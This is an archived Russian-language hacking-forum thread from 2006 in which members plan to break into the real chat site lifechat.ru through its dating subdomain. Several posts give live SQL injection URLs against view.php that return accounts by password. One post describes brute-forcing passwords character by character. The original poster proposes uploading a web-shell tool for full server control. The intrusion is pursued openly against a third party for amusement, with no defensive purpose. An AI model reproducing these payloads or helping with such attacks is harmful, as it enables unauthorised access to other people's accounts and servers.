HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Ломаем чат бородина
  #1  
Старый 03.04.2006, 18:01
artkino
Новичок
Регистрация: 26.02.2006
Сообщений: 21
Провел на форуме:
15048

Репутация: -5
По умолчанию Ломаем чат бородина

Еесть чат www.lifechat.ru как мы все знаем сломать чат на движке проблематично,но мы можем сломать этот чат через службу знакомств на этом же сервре где и чат вот ссылка на знакомства: http://dating.lifechat.ru/
 

  #2  
Старый 03.04.2006, 18:24
seeattact
Banned
Регистрация: 12.01.2006
Сообщений: 621
Провел на форуме:
1425186

Репутация: 121


Отправить сообщение для seeattact с помощью ICQ
По умолчанию

и к чему ты это написал?
 

  #3  
Старый 03.04.2006, 18:27
artkino
Новичок
Регистрация: 26.02.2006
Сообщений: 21
Провел на форуме:
15048

Репутация: -5
По умолчанию

Цитата:
Сообщение от seeattact  
и к чему ты это написал?
А ктому что можно попробовать сломать....
 

  #4  
Старый 03.04.2006, 18:36
seeattact
Banned
Регистрация: 12.01.2006
Сообщений: 621
Провел на форуме:
1425186

Репутация: 121


Отправить сообщение для seeattact с помощью ICQ
По умолчанию

Цитата:
Сообщение от artkino  
А ктому что можно попробовать сломать....
ну вот и пробуй сам.как сломаеш напишеш.
 

  #5  
Старый 03.04.2006, 18:51
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

_http://dating.lifechat.ru/view.php?rand=1'
Но это уже не ко мне, а к ZaCo
__________________
+ (это не крестик, это плюсик!)
__________________


 

  #6  
Старый 03.04.2006, 19:08
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут

Последний раз редактировалось k1b0rg; 03.04.2006 в 19:22..
 

  #7  
Старый 03.04.2006, 19:24
artkino
Новичок
Регистрация: 26.02.2006
Сообщений: 21
Провел на форуме:
15048

Репутация: -5
По умолчанию

Цитата:
Сообщение от k1b0rg  
зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут
Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/
 

  #8  
Старый 03.04.2006, 19:27
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Цитата:
Сообщение от artkino  
Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/
ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить
 

  #9  
Старый 03.04.2006, 19:38
artkino
Новичок
Регистрация: 26.02.2006
Сообщений: 21
Провел на форуме:
15048

Репутация: -5
По умолчанию

Цитата:
Сообщение от k1b0rg  
ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить
Так вот давайте потешимся.
 

  #10  
Старый 03.04.2006, 19:40
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

кому нуда уже все потешились, дальше что?
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ломаем www.antichat.ru. alsa Болталка 19 14.04.2005 12:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ